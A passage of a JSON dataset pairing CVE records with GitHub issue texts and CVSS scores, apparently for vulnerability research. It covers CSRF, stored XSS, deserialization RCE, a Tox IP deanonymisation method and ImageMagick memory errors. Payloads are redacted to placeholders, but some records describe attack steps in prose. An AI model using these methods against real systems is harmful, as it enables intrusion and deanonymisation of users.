        "CVE_ID": "CVE-2018-21029",
        "Issue_Url_old": "https://github.com/systemd/systemd/issues/9397",
        "Issue_Url_new": "https://github.com/systemd/systemd/issues/9397",
        "Repo_new": "systemd/systemd",
        "Issue_Created_At": "2018-06-24T22:42:26Z",
        "description": "RFE: Certificate checking for Resolveds DNS over TLS feature. Since systemd NUMBERTAG APITAG supports DNS over TLS. Currently (systemd version NUMBERTAG APITAG does not certificate checking for DNS Servers as covered in this PR: URLTAG This issue is for keeping track of certificate checking for DNS over TLS.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-21034",
        "Issue_Url_old": "https://github.com/argoproj/argo-cd/issues/470",
        "Issue_Url_new": "https://github.com/argoproj/argo-cd/issues/470",
        "Repo_new": "argoproj/argo-cd",
        "Issue_Created_At": "2018-07-26T23:15:26Z",
        "description": "K8s secrets need to be redacted in API server. We currently treat secrets the same as any other k8s object, displaying the YAML/JSON contents in the UI. But secret values need to be redacted or a separate RBAC rule to view them.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-21037",
        "Issue_Url_old": "https://github.com/intelliants/subrion/issues/638",
        "Issue_Url_new": "https://github.com/intelliants/subrion/issues/638",
        "Repo_new": "intelliants/subrion",
        "Issue_Created_At": "2018-02-13T07:26:55Z",
        "description": "CSRF Attack On Change Password!. Hi Team, The application is vulnerable to CSRF attack. Affected Application Version: Subrion CMS NUMBERTAG The attacker can change the administrator password by sending a crafted request to the application on change password field. The application is not validating the source origin of the request is coming from also CSRF token is not implemented. Proof of concept as given below NUMBERTAG Crafted Code of Change Password of Administrator User. FILETAG NUMBERTAG Crafted Request to Change the Password of Administrator. FILETAG NUMBERTAG The Password is Changed Successfully. FILETAG Recommendation NUMBERTAG Implement CSRF Token NUMBERTAG alidate the Source Origin When you fix the bug, please, can you include my name in the release notes when the bug will be corrected? Name : Tushar Kadam Email : EMAILTAG Thank you.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-21232",
        "Issue_Url_old": "https://github.com/skvadrik/re2c/issues/219",
        "Issue_Url_new": "https://github.com/skvadrik/re2c/issues/219",
        "Repo_new": "skvadrik/re2c",
        "Issue_Created_At": "2018-09-05T07:12:10Z",
        "description": "overflow NUMBERTAG re test fails on system with small stack. Factoring out the issue of URLTAG On small stack systems ( APITAG ) APITAG test fails: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-21234",
        "Issue_Url_old": "https://github.com/oblac/jodd/issues/628",
        "Issue_Url_new": "https://github.com/oblac/jodd/issues/628",
        "Repo_new": "oblac/jodd",
        "Issue_Created_At": "2018-08-17T13:37:15Z",
        "description": "Potential vulnerability in JSON deserialization. Current behavior Jodd's Json parser supports polymorphic deserialization when APITAG is set. If an application parses JSON with this configuration from an untrusted source, it could lead to remote code execution. The problem is quite the same as in other Java JSON libraries. Here you can read more: URLTAG FILETAG Expected behavior At least, you should mention security implication of usage APITAG similar to Jackson databind URLTAG Steps to Reproduce the Problem If necessary, I could send an example of JSON which lead to RCE",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-21247",
        "Issue_Url_old": "https://github.com/LibVNC/libvncserver/issues/253",
        "Issue_Url_new": "https://github.com/libvnc/libvncserver/issues/253",
        "Repo_new": "libvnc/libvncserver",
        "Issue_Created_At": "2018-09-11T15:29:14Z",
        "description": "SECURITY: memory leak in libvncclient in APITAG function. APITAG URLTAG function leaks memory, because tmphost buffer is filled by using snprintf function, but after buffer is being sent back to client using APITAG , which sent the whole tmphost buffer including its uninitialized part, which would expose uninitialized memory of client application. Example file APITAG contains same kind of vulnerability as well. This security issue is a result of my work at Kaspersky Lab ICS CERT Vulnerability Research Group at position of Security Researcher. For more information about ICS CERT please contact: ics EMAILTAG FILETAG Best regards, Pavel Cheremushkin",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-21269",
        "Issue_Url_old": "https://github.com/OpenRC/openrc/issues/201",
        "Issue_Url_new": "https://github.com/openrc/openrc/issues/201",
        "Repo_new": "openrc/openrc",
        "Issue_Created_At": "2018-01-24T14:40:26Z",
        "description": "checkpath: symlinks are followed in non terminal path components. Let's use a separate issue for this so we don't conflate it with the race condition fix in URLTAG With the following service script, CODETAG I can replace APITAG (at my leisure) with a symlink to APITAG ... APITAG and the next time the service is restarted, checkpath will change ownership of APITAG : ERRORTAG Even if the service script checks the return value of checkpath , I have a moment to replace \"bar\" with a symlink. The systemd tmpfiles implementation has a similar issue URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-21270",
        "Issue_Url_old": "https://github.com/mhart/StringStream/issues/7",
        "Issue_Url_new": "https://github.com/mhart/stringstream/issues/7",
        "Repo_new": "mhart/stringstream",
        "Issue_Created_At": "2018-05-14T23:16:57Z",
        "description": "Uninitialized Memory Exposure. According to Snyk URLTAG , _stringstream_ has a vulnerability when run on FILETAG NUMBERTAG and below. The bug comes from this line : URLTAG More details can be found here : URLTAG Thank you for the package, by the way !",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 4.2,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2018-25008",
        "Issue_Url_old": "https://github.com/rust-lang/rust/issues/51780",
        "Issue_Url_new": "https://github.com/rust-lang/rust/issues/51780",
        "Repo_new": "rust-lang/rust",
        "Issue_Created_At": "2018-06-25T15:44:34Z",
        "description": "Insuficient synchronization in APITAG . Consider the following Rust code: ERRORTAG The first thread acquires the lock, modifies the variable, and then drop its Arc without unlocking (that's the point of the APITAG ). The second thread waits until the first thread decrements the count by dropping its Arc, and then uses APITAG to access the content without taking the lock (at that time, the mutex is still locked). My claim is that there is a race between the two accesses of the content of the mutex. The only reason the two accesses would be in a happens before relationship would be that APITAG and APITAG would establish this happens before relationship. However, even though APITAG does use a release write, APITAG only uses a relaxed read of the strong counter (via ERRORTAG ). The fix is to use an acquire read in ERRORTAG . I do not expect significant performance penalty here, since ERRORTAG already contains several release acquire accesses (of the weak count). CC APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2018-25021",
        "Issue_Url_old": "https://github.com/TokTok/c-toxcore/issues/1214",
        "Issue_Url_new": "https://github.com/toktok/c-toxcore/issues/1214",
        "Repo_new": "toktok/c-toxcore",
        "Issue_Created_At": "2018-09-28T08:19:22Z",
        "description": "Massive red shutdown of nodes.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-25022",
        "Issue_Url_old": "https://github.com/TokTok/c-toxcore/issues/873",
        "Issue_Url_new": "https://github.com/toktok/c-toxcore/issues/873",
        "Repo_new": "toktok/c-toxcore",
        "Issue_Created_At": "2018-04-15T06:46:40Z",
        "description": "Onion vulnerability. Currently onion module allows to send any byte sequence through onion path. It can lead to possibility to bypass onion and get IP address (and friend list eventually) knowing only long term public key. Let's say Alice announces itself to Bob through onion path. After announcement Bob knows Alice's long term public key and onion return addresses to send packets back to Alice. But Bob doesn't know IP address of Alice and want to find it out. All he needs to do is send NAT ping request with his own DHT public key to Alice through onion path using onion return addresses he knows. If Bob is lucky enough to have close DHT public key to Alice's key Alice will redirect this ping request directly to Bob. After receiving his own request Bob will know IP address of Alice. Now, if somewone want to know somebody's IP address he can generate close enough long term public key, run many DHT nodes and send pings to them one by one. So I suggest to restrict packet kinds that can be sent through onion path: URLTAG I also monitored tox network through several DHT nodes and didn't notice anything other than onion announce/data packets. So this change shouldn't break anything.",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N",
        "severity": "LOW",
        "baseScore": 3.1,
        "impactScore": 1.4,
        "exploitabilityScore": 1.6
    },
    {
        "CVE_ID": "CVE-2018-25031",
        "Issue_Url_old": "https://github.com/swagger-api/swagger-ui/issues/4872",
        "Issue_Url_new": "https://github.com/swagger-api/swagger-ui/issues/4872",
        "Repo_new": "swagger-api/swagger-ui",
        "Issue_Created_At": "2018-09-13T03:02:46Z",
        "description": "add an APITAG option. Content & configuration Swagger UI configuration options: APITAG Is your feature request related to a problem? APITAG We\u2019ve observed that the ?url= parameter in APITAG allows an attacker to override an otherwise hard coded schema file. This opens the door to issues such as URLTAG and URLTAG which would otherwise be prevented by hard coding the schema file URL. The behavior appears to be a regression in the NUMBERTAG releases. It can easily be reproduced by passing in a URL to the APITAG constructor and then using the ?url parameter to override it, while observing the behavior in the Net panel of your browser\u2019s developer tools. Note that CORS rules can prevent a test from succeeding, but do not prevent a real attack. const ui = APITAG ... url: 'some hard coded APITAG }); Additionally, the URL parameter is dangerous in general because it allows an attacker to provide a similar schema file that instead sends authorization requests to a server under an attacker\u2019s control, which makes it much easier to trick a user into leaking their login credentials. So the URL parameter should not be allowed in any setting where authentication or other sensitive information is used. I\u2019d recommend disabling it by default and cautioning users against enabling it. Describe the solution you'd like APITAG for NUMBERTAG Add an APITAG or similar option. ~If omitted,~ default to false ~if a URL is passed into the constructor, otherwise default true.~ for NUMBERTAG Change the default ~when omitted~ to false. Describe alternatives you've considered APITAG Our workaround was to detect the URL parameter before initializing APITAG and failing early if it was set. Additional context This is taken from a security report given to the Swagger team by Ken Winters, based on investigation done by Gaurav Shet and Ben Zulanch all over at APITAG The decision was made to put this in the public issue tracker because (a) we aren't going to immediately fix this, and (b) the attack surface for this is significantly diminished by our effective sanitization efforts to deter XSS attacks in documents used as input.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-25032",
        "Issue_Url_old": "https://github.com/madler/zlib/issues/605",
        "Issue_Url_new": "https://github.com/madler/zlib/issues/605",
        "Repo_new": "madler/zlib",
        "Issue_Created_At": "2022-03-26T19:07:23Z",
        "description": "CVETAG (zlib memory corruption on deflate). CVETAG tracks a bug in zlib NUMBERTAG which allows memory corruption when deflating (i.e., when compressing) if the input has many distant matches. There is a fix from MENTIONTAG at URLTAG MENTIONTAG reports at URLTAG that this patch never made it into a release, and at the time of writing no distros had picked it up as a fix.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-25033",
        "Issue_Url_old": "https://github.com/admesh/admesh/issues/28",
        "Issue_Url_new": "https://github.com/admesh/admesh/issues/28",
        "Repo_new": "admesh/admesh",
        "Issue_Created_At": "2018-09-12T00:16:49Z",
        "description": "heap buffer flow in stl_update_connects_remove NUMBERTAG Find a heap buffer overflow with the input. Hope this report is helpful. FILETAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-3717",
        "Issue_Url_old": "https://github.com/JacksonTian/anywhere/issues/33",
        "Issue_Url_new": "https://github.com/jacksontian/anywhere/issues/33",
        "Repo_new": "jacksontian/anywhere",
        "Issue_Created_At": "2018-02-14T20:46:12Z",
        "description": "Security issue. Hi, I'm a member of the FILETAG Security WG and we received a report regarding a security issue with this module. We tried inviting the author by e mail but received no response so I'm opening this issue and inviting anyone with commit and npm publish rights to collaborate with us on a fix.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-3740",
        "Issue_Url_old": "https://github.com/rgrove/sanitize/issues/176",
        "Issue_Url_new": "https://github.com/rgrove/sanitize/issues/176",
        "Repo_new": "rgrove/sanitize",
        "Issue_Created_At": "2018-03-20T02:24:07Z",
        "description": "Placeholder.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-3744",
        "Issue_Url_old": "https://github.com/danielcardoso/html-pages/issues/2",
        "Issue_Url_new": "https://github.com/danielcardoso/html-pages/issues/2",
        "Repo_new": "danielcardoso/html-pages",
        "Issue_Created_At": "2018-01-30T15:18:16Z",
        "description": "Security issue. Hello, The FILETAG ecosystem security team has received a report regarding this module. Previously, an email was sent to EMAILTAG , but no response was received. What is the best way to privately reach someone with commit rights to this repo? Feel free to reach out to me directly via the email address listed in my APITAG profile. Thanks!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-3778",
        "Issue_Url_old": "https://github.com/mcollina/aedes/issues/211",
        "Issue_Url_new": "https://github.com/moscajs/aedes/issues/211",
        "Repo_new": "moscajs/aedes",
        "Issue_Created_At": "2018-08-06T17:08:09Z",
        "description": "[SECURITY] Last will messages is not checked against authorization.. The LWT is not checked for authorization. Simple example: ERRORTAG Now, from a client, connect and subscribe to \"will\". From another client, connect with a last will message with topic \"will\". Then send a message to \"test\", breaking the connection (because of authorization failure). Breaking the connection will trigger the LWT, and thus sends a message to \"will\", which can be seen in the other client.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-4862",
        "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/4134",
        "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/4134",
        "Repo_new": "octopusdeploy/issues",
        "Issue_Created_At": "2018-01-03T02:02:42Z",
        "description": "Potential Azure account scoping bypass. An authenticated user with APITAG permission could reference an Azure account in such a way as to bypass the scoping restrictions Relates to APITAG NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-4868",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/202",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/202",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2018-01-01T13:58:07Z",
        "description": "APITAG error in sanitizer_posix.cc. version: exi NUMBERTAG a NUMBERTAG bit build) ./exi NUMBERTAG poc when memory not enough output this error found by afl ERRORTAG testcase: URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-5212",
        "Issue_Url_old": "https://github.com/Arsenal21/simple-download-monitor/issues/27",
        "Issue_Url_new": "https://github.com/arsenal21/simple-download-monitor/issues/27",
        "Repo_new": "arsenal21/simple-download-monitor",
        "Issue_Created_At": "2018-01-02T09:53:54Z",
        "description": "Vulnerability Report: Stored XSS bug at the latest version of simple download monitor. Well ,sir ,I just found a Stored XSS bug here. When I login into the wordpress panel, assume I have a low privilege role like a contributor user. Because the admin user has turned on the option of the wp plugin simple download monitor, a normal user like me can also use it. Now I can write something in the function APITAG Download\": APITAG But when I fuzz the parameters in this plugin, I found when I write something into these points, it does not filter well: APITAG FILETAG FILETAG While it tell us to enter a valid URL of the file in the text box below, I can write something with evil content like: APITAG Then we can publish the post or just submit it to the admin user for an audit. FILETAG It won't be long beofore I get the other user's cookie or do something more evilly. FILETAG FILETAG Well, by the way, I just test the bug in the wordpress NUMBERTAG and the latest version of the wp plugin simple download monitor.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-5246",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/929",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/929",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-01-04T01:33:05Z",
        "description": "memory leaks. ubuntu APITAG magick version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): fontconfig freetype png x zlib ubuntu APITAG magick montage APITAG /dev/null montage: unrecognized image format ERRORTAG /dev/null' @ PATHTAG APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b9ad3 in malloc ( PATHTAG NUMBERTAG f NUMBERTAG f6b7dd in APITAG PATHTAG NUMBERTAG f NUMBERTAG f NUMBERTAG d NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG f NUMBERTAG d NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG a6c3b in APITAG PATHTAG NUMBERTAG f NUMBERTAG dc9af1 in APITAG PATHTAG NUMBERTAG f NUMBERTAG dcc2f4 in APITAG PATHTAG NUMBERTAG f NUMBERTAG de3c7 in APITAG PATHTAG NUMBERTAG f NUMBERTAG d2 in APITAG PATHTAG NUMBERTAG e4ce7 in APITAG PATHTAG NUMBERTAG e4ce7 in main PATHTAG NUMBERTAG f NUMBERTAG f1e5f NUMBERTAG in __libc_start_main PATHTAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b9ad3 in malloc ( PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG d in APITAG PATHTAG NUMBERTAG f NUMBERTAG fe NUMBERTAG a in APITAG PATHTAG NUMBERTAG f NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG a6c3b in APITAG PATHTAG NUMBERTAG f NUMBERTAG dc9af1 in APITAG PATHTAG NUMBERTAG f NUMBERTAG dcc2f4 in APITAG PATHTAG NUMBERTAG f NUMBERTAG de3c7 in APITAG PATHTAG NUMBERTAG f NUMBERTAG d2 in APITAG PATHTAG NUMBERTAG e4ce7 in APITAG PATHTAG NUMBERTAG e4ce7 in main PATHTAG NUMBERTAG f NUMBERTAG f1e5f NUMBERTAG in __libc_start_main PATHTAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG ba NUMBERTAG e in __interceptor_posix_memalign ( PATHTAG NUMBERTAG f NUMBERTAG a in APITAG PATHTAG NUMBERTAG f NUMBERTAG a in APITAG PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG d in APITAG PATHTAG NUMBERTAG f NUMBERTAG fe NUMBERTAG a in APITAG PATHTAG NUMBERTAG f NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG a6c3b in APITAG PATHTAG NUMBERTAG f NUMBERTAG dc9af1 in APITAG PATHTAG NUMBERTAG f NUMBERTAG dcc2f4 in APITAG PATHTAG NUMBERTAG f NUMBERTAG de3c7 in APITAG PATHTAG NUMBERTAG f NUMBERTAG d2 in APITAG PATHTAG NUMBERTAG e4ce7 in APITAG PATHTAG NUMBERTAG e4ce7 in main PATHTAG NUMBERTAG f NUMBERTAG f1e5f NUMBERTAG in __libc_start_main PATHTAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b9ad3 in malloc ( PATHTAG NUMBERTAG f NUMBERTAG a6 in APITAG PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG fe NUMBERTAG a in APITAG PATHTAG NUMBERTAG f NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG a6c3b in APITAG PATHTAG NUMBERTAG f NUMBERTAG dc9af1 in APITAG PATHTAG NUMBERTAG f NUMBERTAG dcc2f4 in APITAG PATHTAG NUMBERTAG f NUMBERTAG de3c7 in APITAG PATHTAG NUMBERTAG f NUMBERTAG d2 in APITAG PATHTAG NUMBERTAG e4ce7 in APITAG PATHTAG NUMBERTAG e4ce7 in main PATHTAG NUMBERTAG f NUMBERTAG f1e5f NUMBERTAG in __libc_start_main PATHTAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b9ad3 in malloc ( PATHTAG NUMBERTAG f NUMBERTAG be NUMBERTAG e in APITAG PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG fe NUMBERTAG a in APITAG PATHTAG NUMBERTAG f NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG a6c3b in APITAG PATHTAG NUMBERTAG f NUMBERTAG dc9af1 in APITAG PATHTAG NUMBERTAG f NUMBERTAG dcc2f4 in APITAG PATHTAG NUMBERTAG f NUMBERTAG de3c7 in APITAG PATHTAG NUMBERTAG f NUMBERTAG d2 in APITAG PATHTAG NUMBERTAG e4ce7 in APITAG PATHTAG NUMBERTAG e4ce7 in main PATHTAG NUMBERTAG f NUMBERTAG f1e5f NUMBERTAG in __libc_start_main PATHTAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b9ad3 in malloc ( PATHTAG NUMBERTAG f NUMBERTAG be NUMBERTAG e in APITAG PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG fe NUMBERTAG a in APITAG PATHTAG NUMBERTAG f NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG a6c3b in APITAG PATHTAG NUMBERTAG f NUMBERTAG dc9af1 in APITAG PATHTAG NUMBERTAG f NUMBERTAG dcc2f4 in APITAG PATHTAG NUMBERTAG f NUMBERTAG de3c7 in APITAG PATHTAG NUMBERTAG f NUMBERTAG d2 in APITAG PATHTAG NUMBERTAG e4ce7 in APITAG PATHTAG NUMBERTAG e4ce7 in main PATHTAG NUMBERTAG f NUMBERTAG f1e5f NUMBERTAG in __libc_start_main PATHTAG SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-5247",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/928",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/928",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-01-04T01:30:39Z",
        "description": "memory leaks. ubuntu APITAG magick version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): fontconfig freetype png x zlib ubuntu APITAG magick montage poc.rla /dev/null montage: improper image header ERRORTAG /dev/null' @ PATHTAG APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b9ad3 in malloc ( PATHTAG NUMBERTAG f NUMBERTAG b NUMBERTAG cda5b in APITAG PATHTAG NUMBERTAG f NUMBERTAG b4a5aaf1 in APITAG PATHTAG NUMBERTAG f NUMBERTAG b4a5d2f4 in APITAG PATHTAG NUMBERTAG f NUMBERTAG b NUMBERTAG f3c7 in APITAG PATHTAG NUMBERTAG f NUMBERTAG b NUMBERTAG f NUMBERTAG d2 in APITAG PATHTAG NUMBERTAG e4ce7 in APITAG PATHTAG NUMBERTAG e4ce7 in main PATHTAG NUMBERTAG f NUMBERTAG b1e NUMBERTAG f NUMBERTAG in __libc_start_main PATHTAG SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-5248",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/927",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/927",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-01-04T01:25:57Z",
        "description": "heap buffer overflow in sixel_decode. ubuntu APITAG magick version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): fontconfig freetype png x zlib FILETAG ubuntu APITAG magick montage APITAG /dev/null APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG at pc NUMBERTAG fcb NUMBERTAG a NUMBERTAG bp NUMBERTAG ffde NUMBERTAG a2fd0 sp NUMBERTAG ffde NUMBERTAG a2fc8 READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG fcb NUMBERTAG a NUMBERTAG in sixel_decode PATHTAG NUMBERTAG fcb NUMBERTAG a NUMBERTAG e in APITAG PATHTAG NUMBERTAG fcb NUMBERTAG a9af1 in APITAG PATHTAG NUMBERTAG fcb NUMBERTAG ac2f4 in APITAG PATHTAG NUMBERTAG fcb0fcbe3c7 in APITAG PATHTAG NUMBERTAG fcb0fc NUMBERTAG d2 in APITAG PATHTAG NUMBERTAG e4ce7 in APITAG PATHTAG NUMBERTAG e4ce7 in main PATHTAG NUMBERTAG fcb0d7c5f NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG a NUMBERTAG b in _start ( PATHTAG NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG b9ad3 in malloc ( PATHTAG NUMBERTAG fcb NUMBERTAG a NUMBERTAG d in APITAG PATHTAG NUMBERTAG fcb NUMBERTAG a9af1 in APITAG PATHTAG NUMBERTAG fcb NUMBERTAG ac2f4 in APITAG PATHTAG NUMBERTAG fcb0fcbe3c7 in APITAG PATHTAG NUMBERTAG fcb0fc NUMBERTAG d2 in APITAG PATHTAG NUMBERTAG e4ce7 in APITAG PATHTAG NUMBERTAG e4ce7 in main PATHTAG NUMBERTAG fcb0d7c5f NUMBERTAG in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in sixel_decode Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff8e NUMBERTAG c NUMBERTAG fff8e NUMBERTAG c NUMBERTAG fff8e NUMBERTAG c NUMBERTAG fff8e NUMBERTAG c NUMBERTAG fff8e NUMBERTAG c NUMBERTAG fff8ea0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8eb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8ec0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8ed0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8ee0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8ef0: fa fa fa fa fa fa fa fa fa fa fa 